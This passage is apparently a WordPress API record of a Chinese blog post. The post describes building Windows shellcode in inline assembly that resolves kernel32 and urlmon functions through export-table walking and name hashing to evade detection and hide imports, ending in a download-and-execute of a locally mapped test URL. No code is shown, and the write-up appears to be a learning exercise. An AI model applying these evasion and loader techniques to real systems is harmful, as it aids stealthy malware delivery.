\u8fd9\u91cc\u63d2\u4e00\u53e5\uff0c\u524d\u4e00\u9635\u5b50\u542c\u5230\u67d0\u4e2a\u540c\u4e8b\u8bf4\u4e86\u4e00\u53e5\u8bdd\u201cMD5\u52a0\u5bc6\u7b97\u6cd5\u201d\uff0c\u8fd9\u91cc\u8981\u8bf4\u660e\u4e00\u4e0bMD5,MD4,SHA256\u90fd\u5c5e\u4e8eHash\u7b97\u6cd5\uff0cHash\u7b97\u6cd5\u662f\u7528\u6765\u505a\u5feb\u901f\u67e5\u8be2\u7684\uff0c\u7531\u4e8e\u7b97\u6cd5\u7684\u7279\u6027\uff0c\u51e0\u4e4e\u4e0d\u53ef\u9006\uff0c\u6240\u4ee5\u4e0d\u80fd\u8bf4\u662f\u52a0\u5bc6\u7b97\u6cd5\u3002<br> \u5410\u69fd\u4e00\u4e0b\uff0c\u52a0\u5bc6\u89e3\u5bc6\u771f\u7684\u662f\u4e0d\u820d\u5f97\u5728\u4ee3\u7801\u91cc\u5199\u5907\u6ce8\uff0c\u770b\u7684\u7d2f\u6b7b\u4eba\u4e86\u3002\u771f\u4e0d\u9002\u5408\u65b0\u624b\u770b\u3002 <\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u672c\u6587\u63a5\u4e0a\u4e00\u7bc7\uff1a \u770b\u5b8c\u7406\u8bba\uff0c\u63a5\u7740\u8981\u6765\u5199\u4ee3\u7801\u5b9e\u8df5\u4e00\u4e0b\u3002 \u8981\u5b9e\u73b0\u7684\u529f\u80fd\u662f\u901a\u8fc7Inline Assembly \u6253\u5f00 C:\\1.exe \u5148\u8981\u83b7\u53d6kernel32.dll\u5728\u5185\u5b58\u4e2d\u7684\u57fa\u5740\uff0c\u56e0\u4e3akernel32\u4e2d\u6709\u6211\u9700\u8981\u7684\u51fd\u6570\uff0c\u6709\u4e24\u79cd\u65b9\u6cd5\u3002 \u7b2c\u4e00\u79cd\u65b9\u6cd5\uff08https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html\uff09\uff1a \u7b2c\u4e8c\u79cd\u65b9\u6cd5\uff08\u52a0\u5bc6\u89e3\u5bc6\u91cc\u7684\u65b9\u6cd5\uff09\uff1a \u672c\u6587\u91c7\u7528\u7b2c\u4e00\u79cd\u65b9\u6cd5\u3002 \u57fa\u7840\u7248ShellCode: \u7a0b\u5e8f\u5c31\u662f\u627e\u5230kernel32.dll \u7136\u540e\u627e\u5230\u5bfc\u51fa\u8868\uff0c\u904d\u5386\u627e\u5230Function name Table \u4e2dWinExec\u7684\u4f4d\u7f6e\uff0c \u901a\u8fc7\u8fd9\u4e2a\u4f4d\u7f6e\u627e\u5230Ordinal Table\u4e2d\u6307\u5b9a\u7684index\uff0c\u901a\u8fc7\u8fd9\u4e2aindex\u5728 Address Table\u627e\u5230 WinExec\u7684\u5730\u5740\uff0c\u7136\u540e\u4f20\u53c2\uff0ccall\u8fd9\u4e2a\u5730\u5740\u3002 \u8fdb\u9636\u7248ShellCode: \u8fdb\u9636\u7248ShellCode\u7528\u4e86\u52a0\u5bc6\u89e3\u5bc6\u4e2d\u7684Hash\u7b97\u6cd5\u627eFunction Name\uff0c\u9632\u6b62\u88ab\u68c0\u6d4b\u5230\u3002 \u7ec8\u6781\u7248\uff08\u52a0\u5bc6\u89e3\u5bc6\u7248\uff09 \u7a0b\u5e8f\u7684\u529f\u80fd\u662f\u4ecehttp:\/\/ll.com\/1.exe\u4e0b\u8f7d\u5e76\u6267\u884c\u3002ll.com\u53ef\u4ee5\u5728etc\\hosts\u91cc\u505a\u6620\u5c04\u3002 \u53ea\u662f\u6838\u5fc3\u4ee3\u7801\u7684\u601d\u8def\u548c\u52a0\u5bc6\u89e3\u5bc6\u4e00\u6837\uff0c\u533a\u522b\u662f\u6211\u628a\u6570\u636e\u76f4\u63a5\u5728\u6c47\u7f16\u4ee3\u7801\u91ccpush\u4e86\u3002 \u5148\u83b7\u53d67\u4e2aKernel32\u7684\u51fd\u6570\u5730\u5740\uff0c\u518d\u83b7\u53d6Urlmon\u7684\u51fd\u6570\u5730\u5740\uff0c\u653e\u5230\u6808\u91cc\uff0c\u6700\u540e\u901a\u8fc7ebp\u8c03\u7528\u6240\u9700\u8981\u7684\u51fd\u6570\u3002 \u7f16\u8bd1\uff08MinGW\uff09\uff1a \u5173\u4e8e\u8fd9\u91cc\u7684Hash\u7b97\u6cd5\u53ef\u4ee5\u53c2\u8003\u8fd9\u7bc7\uff1a \u7528PEstudio\u67e5\u770b\u7ec8\u6781\u7248\u7f16\u8bd1\u51fa\u7684\u7a0b\u5e8f\uff0c\u53ef\u4ee5\u770b\u5230Import table\u91cc\u6ca1\u6709\u8bb0\u5f55\u76f8\u5173\u7684\u51fd\u6570\u3002 \u4ece\u800c\u66f4\u52a0\u9690\u853d\u3002 \u8fd9\u91cc\u63d2\u4e00\u53e5\uff0c\u524d\u4e00\u9635\u5b50\u542c\u5230\u67d0\u4e2a\u540c\u4e8b\u8bf4\u4e86\u4e00\u53e5\u8bdd\u201cMD5\u52a0\u5bc6\u7b97\u6cd5\u201d\uff0c\u8fd9\u91cc\u8981\u8bf4\u660e\u4e00\u4e0bMD5,MD4,SHA256\u90fd\u5c5e\u4e8eHash\u7b97\u6cd5\uff0cHash\u7b97\u6cd5\u662f\u7528\u6765\u505a\u5feb\u901f\u67e5\u8be2\u7684\uff0c\u7531\u4e8e\u7b97\u6cd5\u7684\u7279\u6027\uff0c\u51e0\u4e4e\u4e0d\u53ef\u9006\uff0c\u6240\u4ee5\u4e0d\u80fd\u8bf4\u662f\u52a0\u5bc6\u7b97\u6cd5\u3002 \u5410\u69fd\u4e00\u4e0b\uff0c\u52a0\u5bc6\u89e3\u5bc6\u771f\u7684\u662f\u4e0d\u820d\u5f97\u5728\u4ee3\u7801\u91cc\u5199\u5907\u6ce8\uff0c\u770b\u7684\u7d2f\u6b7b\u4eba\u4e86\u3002\u771f\u4e0d\u9002\u5408\u65b0\u624b\u770b\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,2],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/160"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=160"}],"version-history":[{"count":7,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/160\/revisions"}],"predecessor-version":[{"id":173,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/160\/revisions\/173"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}